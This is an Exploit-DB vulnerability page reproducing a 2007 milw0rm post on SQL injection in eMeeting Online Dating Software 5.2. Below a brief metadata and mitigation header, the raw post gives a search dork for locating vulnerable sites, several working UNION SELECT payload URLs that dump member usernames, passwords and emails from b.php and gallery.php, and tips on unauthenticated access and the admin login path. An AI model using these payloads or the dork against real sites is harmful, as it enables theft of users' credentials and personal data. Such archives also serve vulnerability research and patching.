eMeeting Online Dating Software 5.2 SQL Injection Vulnerability

vendor:

Online Dating Software

by:

t0pP8uZz & xprog

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Online Dating Software

Affected Version From: 5.2

Affected Version To: 5.2

Patch Exists: NO

Related CWE:

CPE: a:emeeting:online_dating_software:5.2

Metasploit:

Other Scripts:

Platforms Tested:

2007

eMeeting Online Dating Software 5.2 SQL Injection Vulnerability

The b.php and gallery.php files in eMeeting Online Dating Software 5.2 are vulnerable to SQL injection attacks. An attacker can exploit these vulnerabilities to extract sensitive information from the database, such as usernames, passwords, and email addresses.

Mitigation:

Update the software to a patched version or implement proper input validation and parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+        eMeeting Online Dating Software 5.2 SQL Injection Vulnerbilitys         +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: eMeeting Online Dating Software
DORK: allintext:"Home Member Search Chat Room Forum Help/Support privacy policy"


DESCRIPTION: 
b.php and gallery.php ID among others on this script are SQL injectable.


EXPLOITS:
http://www.site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/*
http://www.site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/**/where/**/username=0x61646D696E/*

http://www.site.com/account/gallery.php?p=gal&id=-1/**/UNION/**/ALL/**/SELECT/**/null,null,null,concat(0x273e3c2f74643e,username,0x3a,password,0x3a,email,0x3c62723e3c2f2f),null,null/**/from/**/members/*


NOTE:
Doesnt look like admin user/password is stored in database, probably in the config. =/
Unless they made a user account with the same user/pass, the admin login is in
/newadmin/login.php if you want to try.

b.php only returns one row of data, but login not required.
gallery.php can return many rows but login is required.


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !


--==+================================================================================+==--
--==+        eMeeting Online Dating Software 5.2 SQL Injection Vulnerbilitys         +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-06]